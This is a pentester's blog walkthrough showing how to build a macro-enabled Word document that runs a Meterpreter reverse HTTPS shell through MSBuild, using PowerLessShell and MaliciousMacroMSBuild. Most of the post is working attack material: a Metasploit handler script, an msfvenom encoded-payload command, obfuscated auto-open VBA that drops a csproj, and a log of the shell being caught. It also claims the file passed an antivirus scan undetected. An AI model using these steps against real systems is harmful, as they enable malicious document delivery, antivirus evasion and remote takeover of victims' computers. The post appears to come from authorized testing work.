PowerLessShell + MaliciousMacroMSBuild = Shells

While I haven't used it recently, I wanted to share my brief walkthrough of using PowerLessShell with MaliciousMacroMSBuild.

PowerLessShell - Introduction

I started this post in late 2018, but I just got around to catching up on it and finishing the post.

That said, you can find these tools in their respective GitHub repositories.

I was also waiting for some engagements to end, but I haven't used this recently enough for it to affect my work.

I'm not certain if I really needed to use both tools at the time, but no defenses that I ran up against caught me.

Generating the Reverse Shell

First, I created a reverse_https resource script. This is a step that I should do more often, as it makes life much easier.

root@kali:~/maldoc# cat reverse_https.rc
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.5.135
set LPORT 443
set ExitOnSession false
set EnableStageEncoding true
exploit -j -z

Next, I generated my raw Meterpreter payload and saved it to a file.

root@kali:~/maldoc# msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.46 LPORT=443 -e x86/shikata_ga_nai -f raw > raw_shikata_reverse_https
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 614 (iteration=0)
x86/shikata_ga_nai chosen with final size 614
Payload size: 614 bytes

Creating the Malicious VBA

First, using MaliciousMacroMSBuild, I created a malicious VBA file with the raw shellcode payload.

root@kali:~/maldoc# cd ~/tools/MaliciousMacroMSBuild/
root@kali:~/tools/MaliciousMacroMSBuild# python m3-gen.py -i /root/maldoc/raw_shikata_reverse_https -p shellcode -o /root/maldoc/macro.vba

 /$$      /$$  /$$$$$$   /$$$$$$ 
| $$$    /$$$ /$$__  $$ /$$__  $$
| $$$$  /$$$$|__/  \ $$| $$  \__/
| $$ $$/$$ $$   /$$$$$/| $$ /$$$$
| $$  $$$| $$  |___  $$| $$|_  $$
| $$\  $ | $$ /$$  \ $$| $$  \ $$
| $$ \/  | $$|  $$$$$$/|  $$$$$$/
|__/     |__/ \______/  \______/ 

Malicious Macro MSBuild Generator v2.1
Author : Rahmat Nurfauzi (@infosecn1nja)
   
[+] Writing msbuild shellcode payload.
[+] /root/maldoc/macro.vba macro sucessfully saved to disk.

As you can see, I now had an obfuscated VBA file that I could embed into a document.

Function decodeBase64(ByVal vCode)
  Dim oXML, oNode
  Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
  Set oNode = oXML.CreateElement("base64")
  oNode.dataType = "bin.base64"
  oNode.Text = vCode
  decodeBase64 = sBinToStr(oNode.nodeTypedValue)
  Set oNode = Nothing
  Set oXML = Nothing
End Function

... <snip> ...

  iCdZuKSqAn = iCdZuKSqAn + StrRev("=4DdjVmavJHUvwjPrNXYUdmbpNXVvwjPrNXYU9CP+UGZvN0L84TXd13OpQ3YlR3byBFZs9EbmBHbgQnbpVHI0V3bsQ3YlR3byB1d")

... <snip> ...

Sub AutoOpen()
  Auto_Open
End Sub

Sub Workbook_Open()
  Auto_Open
End Sub

... <snip> ...

Function Delay(time as String) As String
  WaitUntil = Now() + TimeValue(time)
  Do While Now < WaitUntil
  Loop
End Function

Creating the MSBuild Project

Next, using PowerLessShell, I created a CSPROJ file that contained my raw payload.

root@kali:~/maldoc# cd ~/tools/PowerLessShell/
root@kali:~/tools/PowerLessShell# python PowerLessShell.py



PowerLessShell - Remain Stealth
         More PowerShell Less Powershell.exe - Mr.Un1k0d3r RingZer0 Team
            ___
        .-"; ! ;"-.
      .'!  : | :  !`.
     /\  ! : ! : !  /\
    /\ |  ! :|: !  | /\
   (  \ \ ; :!: ; / /  )
  ( `. \ | !:|:! | / .' )
  (`. \ \ \!:|:!/ / / .')
   \ `.`.\ |!|! |/,'.' /
    `._`.\\!!!// .'_.'
       `.`.\|//.'.'
        |`._`n'_.'|
        `----^----"



(Set payload type 'powershell, shellcode')>>> shellcode

(Path to the raw shellcode file)>>> /root/maldoc/raw_shikata_reverse_https

(Path for the generated MsBuild out file)>>> payload.csproj

(Set USERDOMAIN condition (Default ''))>>>

(Use known process name to perform MsBuild renaming (Default: False))>>>


[+] payload.csproj was generated.
[+] payload.csproj.bat was generated.
[+] Run the command inside of payload.csproj.bat on the target system using WMI.

root@kali:~/maldoc# mv ~/tools/PowerLessShell/payload.csproj .

As you can see, this was a basic MSBuild project, with my encoded payload and no references to PowerShell.exe.

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="AoUao">
   <AoUao />
   <pzlLVbGCgifvAoAcNMIEK />
   </Target>

... <snip> ...

      public static byte[] OknNcSt(byte[] Jgbly, byte[] dxrgsBpAjTd) {
        return GihZbZpYFNRvpOZnU(Jgbly, dxrgsBpAjTd);
      }
    }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Combining the Two

The next step was to combine the PowerLessShell csproj into the M3G VBA file.

First, I converted the original csproj file into a base64 encoded string.

root@kali:~/maldoc# cat payload.csproj | base64 -w 0
PFByb2pl ...<snip>l; b2plY3Q+Cg==

Next, I replaced the obfuscated csproj inside of the VBA file. This is the reverse base64 variable that you can see below.

PowerLessShell - Encoded CSPROJ

As you can see, I just replaced the existing variable with my encoded PowerLessShell payload.

Function LhYEMJZxkac()
  iCdZuKSqAn = "PFByb2pl ...<snip> b2plY3Q+Cg=="

  Open Environ(Replace("U###SE###RP###ROF###ILE","###","")) & "\" & Replace("D###ow###nl###oa###ds","###","") & "\CreateWordDoc.csproj" For Output As #1
  Print #1, decodeBase64(iCdZuKSqAn)
  Close #1

Note: you need to break the the obfuscated variable into multiple lines, which I'll cover in the next section.

Creating the Document

With my malicious payload created, it was time to add a macro to my Word document.

First, I created a new macro in my blank document.

Create macro window

Next, I pasted the contents of my (modified) VBA file into the macro editor.

Pasted VBA macro

After pasting the VBA, I fixed my encoded CSPROJ variable so that it appended the string over multiple lines.

PowerLessShell - Fixed encoded CSPROJ variable

With my macro created, I saved it, and saw the new methods in my document.

Saved macro methods

Finally, I saved the entire document as a DOCM file and sent it to my victim.

Saving the docm file

Catching Some Shells

With my malicious document created, I started up my reverse HTTPS handler.

root@kali:~/maldoc# root@kali:~/maldoc# msfconsole -r reverse_https.rc 
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v5.0.53-dev                          ]
+ -- --=[ 1931 exploits - 1079 auxiliary - 331 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

[*] Processing reverse_https.rc for ERB directives.
resource (reverse_https.rc)> use multi/handler
resource (reverse_https.rc)> set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
resource (reverse_https.rc)> set LHOST 192.168.5.135
LHOST => 192.168.5.135
resource (reverse_https.rc)> set LPORT 443
LPORT => 443
resource (reverse_https.rc)> set ExitOnSession false
ExitOnSession => false
resource (reverse_https.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (reverse_https.rc)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://192.168.5.135:443

When I opened the document on my target, I received a warning about enabling macros.

PowerLessShell - Enable macros

When I enabled macros, the document loaded, and I caught a reverse shell on my attacker system!

[*] https://192.168.5.135:443 handling request from 192.168.5.100; (UUID: 7aj1ohiy) Encoded stage with x86/shikata_ga_nai
[*] https://192.168.5.135:443 handling request from 192.168.5.100; (UUID: 7aj1ohiy) Staging x86 payload (181366 bytes) ...
[*] Meterpreter session 1 opened (192.168.5.135:443 -> 192.168.5.100:63074) at 2020-10-19 17:18:18 -0400
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  1         meterpreter x86/windows  TARGET\Doyler @ TARGET  192.168.5.135:443 -> 192.168.5.100:63074 (192.168.5.100)

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : TARGET
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

As an added bonus, I scanned the file using Malwarebytes, and it came back clean!

Malwarebytes clean scan

PowerLessShell - Conclusion

While this is an older toolkit, I can confirm that this method can still create viable malicious documents.

It was probably not necessary to use both of these tools at the same time, but it was nice to not need PowerShell for execution.

Let me know if you want me to try any newer tools, or have other suggestions for creating malicious documents!

doyler on Githubdoyler on Twitter
doyler
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he's done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!

He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.

When he's not figuring out what cert to get next or side project to work on, he enjoys playing video games, traveling, and watching sports.

As an Amazon Associate I earn from qualifying purchases.

Common passed on this blog, I made it to a jam.

Leave a Comment

Filed under Security Not Included

Leave a Reply

Your email address will not be published. Required fields are marked *

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.